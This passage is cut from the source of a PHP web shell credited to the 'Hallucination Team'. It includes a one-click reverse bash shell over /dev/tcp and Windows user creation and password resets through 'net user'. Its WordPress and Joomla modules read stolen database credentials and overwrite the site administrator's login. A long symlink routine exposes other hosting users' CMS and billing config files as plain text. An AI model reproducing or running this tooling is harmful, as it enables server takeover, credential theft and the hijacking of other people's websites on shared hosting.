1503.                     echo "[add localgroup] -> <font color='#ff0066'>Gagal</font><br>";
1504.                 }
1505.                 echo "------------------------------<br>";
1506.             }
1507.         } elseif($_POST['s_opsi']) {
1508.             $user = htmlspecialchars($_POST['r_user']);
1509.             if($_POST['opsi'] == '1') {
1510.                 $cek = exe("net user $user");
1511.                 echo "Checking username <font color=lime>$user</font> ....... ";
1512.                 if(preg_match("/$user/", $cek)) {
1513.                     echo "[ <font color=lime>Sudah ada</font> ]<br>
1514.                    ------------------------------<br><br>
1515.                    <pre>$cek</pre>";
1516.                 } else {
1517.                     echo "[ <font color=#ff0066>belum ada</font> ]";
1518.                 }
1519.             } elseif($_POST['opsi'] == '2') {
1520.                 $cek = exe("net user $user 3rr0r");
1521.                 if(preg_match("/$user/", exe("net user"))) {
1522.                     echo "[change password: <font color=lime>3rr0r</font>] -> ";
1523.                     if($cek) {
1524.                         echo "<font color=lime>Berhasil</font>";
1525.                     } else {
1526.                         echo "<font color=#ff0066>Gagal</font>";
1527.                     }
1528.                 } else {
1529.                     echo "[INFO] -> <font color=#ff0066>user <font color=lime>$user</font> belum ada</font>";
1530.                 }
1531.             } elseif($_POST['opsi'] == '3') {
1532.                 $cek = exe("net user $user /DELETE");
1533.                 if(preg_match("/$user/", exe("net user"))) {
1534.                     echo "[remove user: <font color=lime>$user</font>] -> ";
1535.                     if($cek) {
1536.                         echo "<font color=lime>Berhasil</font>";
1537.                     } else {
1538.                         echo "<font color=#ff0066>Gagal</font>";
1539.                     }
1540.                 } else {
1541.                     echo "[INFO] -> <font color=#ff0066>user <font color=lime>$user</font> belum ada</font>";
1542.                 }
1543.             } else {
1544.                 //
1545.             }
1546.         } else {
1547.             echo "-- Create RDP --<br>
1548.            <form method='post'>
1549.            <input type='text' name='user' placeholder='username' value='3rr0r' requi#ff0066>
1550.            <input type='text' name='pass' placeholder='password' value='3rr0r' requi#ff0066>
1551.            <input type='submit' name='create' value='>>'>
1552.            </form>
1553.            -- Option --<br>
1554.            <form method='post'>
1555.            <input type='text' name='r_user' placeholder='username' requi#ff0066>
1556.            <select name='opsi'>
1557.            <option value='1'>Cek Username</option>
1558.            <option value='2'>Ubah Password</option>
1559.            <option value='3'>Hapus Username</option>
1560.            </select>
1561.            <input type='submit' name='s_opsi' value='>>'>
1562.            </form>
1563.            ";
1564.         }
1565.     } else {
1566.         echo "<font color=#ff0066>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
1567.     }
1568. } elseif($_GET['do'] == 'network') {
1569.     echo "<center><form method='post'>
1570.     Back Connect: <br>
1571.     <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'><br>
1572.     <input type='text' placeholder='port' name='port_bc' value='6969'><br>
1573.     <input type='submit' name='sub_bc' value='Reverse' style='width: 210px;'>
1574.     </form>";
1575.     if(isset($_POST['sub_bc'])) {
1576.         $ip = $_POST['ip_bc'];
1577.         $port = $_POST['port_bc'];
1578.         exe("/bin/bash -i >& /dev/tcp/$ip/$port 0>&1");
1579.     }
1580.     echo "</center>";
1581.    
1582. }
1583. elseif($_GET['do'] == 'about') {
1584.    
1585.     echo '<center>JAV Shell<hr>Badc0de Shell Recoded By Hallucination Team<br>For More Script Visit <a href="https://www.facebook.com/groups/hallucyber/">Here</a>';
1586.    
1587. }
1588. elseif($_GET['do'] == 'auto_cu_wp') {
1589. if($_POST['gass']) {
1590.     echo "<center><h1>WordPress Auto Change User 2</h1>
1591.         <form method='post'>
1592.         Link Config: <br>
1593.         <textarea name='link' style='width: 450px; height:250px;'>";
1594.     UrlLoop($_POST['linkconf'],'wordpress');   
1595.     echo"</textarea><br>
1596.         <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Hajar!!'>
1597.         </form></center>";
1598. }   else {
1599.         echo "<center><h1>WordPress Auto Change User 2</h1>
1600.         <form method='post'>
1601.         Link Config: <br>
1602.         <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/bad_symconf/'><br>
1603.         <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
1604.         </form></center>";
1605.     }
1606. if($_POST['auto_cu_wp']) {
1607.    
1608.         function anucurl($sites) {
1609.             $ch = curl_init($sites);
1610.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1611.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1612.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1613.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1614.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1615.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1616.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1617.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1618.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1619.             $data = curl_exec($ch);
1620.                   curl_close($ch);
1621.             return $data;
1622.         }
1623.         $link = explode("\r\n", $_POST['link']);
1624.         $user = "Hallucination";
1625.         $pass = "Hallucination";
1626.         $passx = md5($pass);
1627.         foreach($link as $dir_config) {
1628.             $config = anucurl($dir_config);
1629.             $dbhost = ambilkata($config,"DB_HOST', '","'");
1630.             $dbuser = ambilkata($config,"DB_USER', '","'");
1631.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1632.             $dbname = ambilkata($config,"DB_NAME', '","'");
1633.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
1634.             $prefix = $dbprefix."users";
1635.             $option = $dbprefix."options";
1636.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1637.             $db = mysql_select_db($dbname);
1638.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1639.             $result = mysql_fetch_array($q);
1640.             $id = $result[ID];
1641.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1642.             $result2 = mysql_fetch_array($q2);
1643.             $target = $result2[option_value];
1644.             if($target == '') {                
1645.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1646.             } else {
1647.                 echo "<font color=blue>[</font> $target <font color=blue>]</font></font><br>";
1648.             }
1649.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1650.             if(!$conn OR !$db OR !$update) {
1651.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1652.                 mysql_close($conn);
1653.             } else {
1654.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1655.                     echo "[+] username: <font color=lime>$user</font><br>";
1656.                     echo "[+] password: <font color=lime>$pass</font><br><br>";    
1657.                    
1658.                 mysql_close($conn);
1659.             }
1660.         }
1661.     }  
1662.  
1663. }
1664. elseif($_GET['do'] == 'auto_cu_joomla') {
1665. if($_POST['gass']) {
1666.     echo "<center><h1>Joomla Auto Change User 2</h1>
1667.         <form method='post'>
1668.         Link Config: <br>
1669.         <textarea name='link' style='width: 450px; height:250px;'>";
1670.     UrlLoop($_POST['linkconf'],'joomla');  
1671.     echo"</textarea><br>
1672.         <input type='submit' style='width: 450px;' name='auto_cu_joomla' value='Hajar!!'>
1673.         </form></center>";
1674. }   else {
1675.         echo "<center><h1>Joomla Auto Change User 2</h1>
1676.         <form method='post'>
1677.         Link Config: <br>
1678.         <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/bad_symconf/'><br>
1679.         <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
1680.         </form></center>";
1681.     }
1682. if($_POST['auto_cu_joomla']) {
1683.    
1684.         function anucurl($sites) {
1685.             $ch = curl_init($sites);
1686.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1687.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1688.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1689.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1690.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1691.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1692.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1693.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1694.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1695.             $data = curl_exec($ch);
1696.                   curl_close($ch);
1697.             return $data;
1698.         }
1699.         $link = explode("\r\n", $_POST['link']);
1700.         $user = "Hallucination";
1701.         $pass = "Hallucination";
1702.         $passx = md5($pass);
1703.         foreach($link as $dir_config) {
1704.             $config = anucurl($dir_config);
1705.                     $dbhost = ambilkata($config,"host = '","'");
1706.                     $dbuser = ambilkata($config,"user = '","'");
1707.                     $dbpass = ambilkata($config,"password = '","'");
1708.                     $dbname = ambilkata($config,"db = '","'");
1709.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
1710.                     $prefix = $dbprefix."users";
1711.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1712.                     $db = mysql_select_db($dbname);
1713.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1714.                     $result = mysql_fetch_array($q);
1715.                     $id = $result['id'];
1716.                     $site = ambilkata($config,"sitename = '","'");
1717.                     $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
1718.                     echo "Config => ".$dir_config."<br>";
1719.                     echo "CMS => Joomla<br>";
1720.                     if($site == '') {
1721.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
1722.                     } else {
1723.                         echo "Sitename => $site<br>";
1724.                     }
1725.                     if(!$update OR !$conn OR !$db) {
1726.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1727.                     } else {
1728.                         echo "Status => Done , Username : <font color=lime>$user</font> Password : <font color=lime>$pass</font><br><br>";
1729.                     }
1730.                     mysql_close($conn);
1731.                     }
1732.     }  
1733. }
1734. elseif($_GET['do'] == 'symconfig') {
1735. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
1736. echo '<script>alert("Skid this won\'t work on Windows")</script>';
1737. exit;
1738. }
1739. else
1740. {
1741. if($_POST["m"] && !$_POST["passwd"]==""){
1742. @mkdir("bad_symconf", 0777);
1743. @chdir("bad_symconf");
1744. @symlink("/","root");
1745. $htaccess="Options Indexes FollowSymLinks
1746. DirectoryIndex Hallucination.htm
1747. AddType text/plain .php
1748. AddHandler text/plain .php
1749. Satisfy Any";
1750. @file_put_contents(".htaccess",$htaccess);
1751. $etc_passwd=$_POST["passwd"];
1752. $etc_passwd=explode("\n",$etc_passwd);
1753. foreach($etc_passwd as $passwd){
1754. $pawd=explode(":",$passwd);
1755. $user =$pawd[0];
1756.  
1757. @symlink('/','bad_symconf/root');
1758. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
1759. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
1760. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
1761. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
1762. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
1763. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
1764. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
1765. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
1766. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
1767. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
1768. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
1769. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
1770. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
1771. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
1772. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
1773. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
1774. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
1775. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
1776. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
1777. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
1778. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
1779. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
1780. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
1781. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
1782. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
1783. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
1784. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
1785. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
1786. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
1787. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
1788. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
1789. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
1790. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
1791. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
1792. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
1793. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
1794. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
1795. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
1796. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
1797. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
1798. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
1799. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
1800. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
1801. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
1802. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
1803. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
1804. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
1805. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
1806. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
1807. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1808. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1809. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
1810. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
1811. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
1812. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
1813. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
1814. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
1815. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
1816. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
1817. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
1818. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
1819. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
1820. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
1821. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
1822. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
1823. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
1824. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
1825. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
1826. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
1827. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
1828. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
1829. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
1830. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
1831. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
1832. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
1833. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
1834. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
1835. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
1836. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
1837. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
1838. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
1839. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
1840. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
1841. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
1842. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
1843. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
1844. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
1845. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
1846. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
1847. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
1848. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
1849. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
1850. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
1851. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
1852. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
1853. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
1854. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
1855. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
1856. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
1857. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1858. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1859. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1860. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
1861. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
1862. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
1863. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
1864. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
1865. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
1866. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
1867. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
1868. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
1869. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
1870. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
1871. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
1872. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
1873. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
1874. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
1875. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
1876. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
1877. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
1878. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
1879. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
1880. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
1881. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
1882. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
1883. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
1884. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
1885. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
1886. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
1887. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
1888. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
1889. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
1890. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
1891. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
1892. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
1893. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
1894. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
1895. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
1896. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
1897. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
1898. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
1899. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
1900. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
1901. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
1902. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
1903. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
1904. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
1905. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
1906. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
1907. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
1908. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
1909. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
1910. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
1911. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
1912. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
1913. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
1914. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
1915. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
1916. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
1917. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
1918. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
1919. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
1920. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
1921. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
1922. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
1923. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
1924. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
1925. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
1926. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
1927. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
1928. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
1929. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
1930. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
1931. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
1932. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
1933. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
1934. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
1935. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
1936. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
1937. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
1938.  
1939. //Home1
1940.  
1941. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
1942. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
1943. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
1944. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
1945. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
1946. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
1947. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
1948. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
1949. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
1950. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
1951. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
1952. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
1953. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
1954. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
1955. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
1956. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
1957. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
1958. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
1959. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
